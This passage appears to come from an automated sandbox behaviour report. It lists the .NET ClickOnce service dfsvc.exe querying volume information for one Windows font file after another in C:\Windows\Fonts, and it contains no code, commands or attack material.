              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\userFR.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\userFI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\userFB.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\userST.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\userSTI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\userSTB.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\userSTBI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
